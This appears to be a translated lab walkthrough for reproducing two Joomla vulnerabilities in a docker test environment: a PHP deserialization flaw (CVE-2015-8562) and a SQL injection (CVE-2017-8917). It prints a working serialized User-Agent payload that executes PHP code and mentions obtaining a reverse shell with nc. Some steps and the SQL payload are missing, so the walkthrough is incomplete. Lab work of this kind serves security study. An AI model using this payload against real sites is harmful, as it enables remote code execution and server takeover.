Table of contents
CVE-2015-8562 deserialization vulnerability
CVE-2017-8917 SQL injection vulnerability
Introduction to Joomla
Joomla! is a world-renowned content management system. [1] Joomla! is a software system developed by using PHP language and MySQL database . The latest version is 3.9.11. It can be executed on various platforms such as Linux , Windows , and MacOSX .
Environment build
- Switch to the joomla related directory and deploy the docker environment
- cd /root/vulhub/joomla
- Select the vulnerability you want to reproduce, switch to the directory, and run the following command
- docker-compose build
- docker-compose up -d
- Visit the target website according to the 'README.zh-cn.md' file in the directory
CVE-2015-8562 deserialization vulnerability
The cause of the vulnerability
Before PHP5.6.13, when reading the stored session, if there is an error in deserialization, it will skip the current piece of data and deserialize the next piece of data. However, Joomla stores the session in the Mysql database, and the encoding is utf8. When we insert 4-byte utf8 data, it will cause truncation. The truncated data will fail when deserialized, and finally trigger the deserialization vulnerability. Through the Gadget in Joomla, the result of arbitrary code execution can be caused.
Affected version
- Joomla 1.5.x, 2.x, and 3.x before 3.4.6
- PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
Vulnerability recurrence
1. First, without the User-Agent header, visit the target homepage first, and write down the Cookie returned by the server
2. Then set the User-Agent to the following content, and then set the cookie to the content returned by the target website just now.
123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:
{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"fee
d_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connectio
n";i:1;}
3. Then use the Repeater module of burp to construct the following payload and send it. The first data will enter the Mysql database.
。
4. Then we send the data packet once, and we can see that the code is executed.
5. We can also use the script written by the big guy to get the reverse shell.
6.nc gets the response from the target server and gets bash.
。
CVE-2017-8917 SQL injection vulnerability
Affected version
- Joomla 3.7.0
Vulnerability recurrence
payload
Then use the browser to access the payload and report an error successfully.
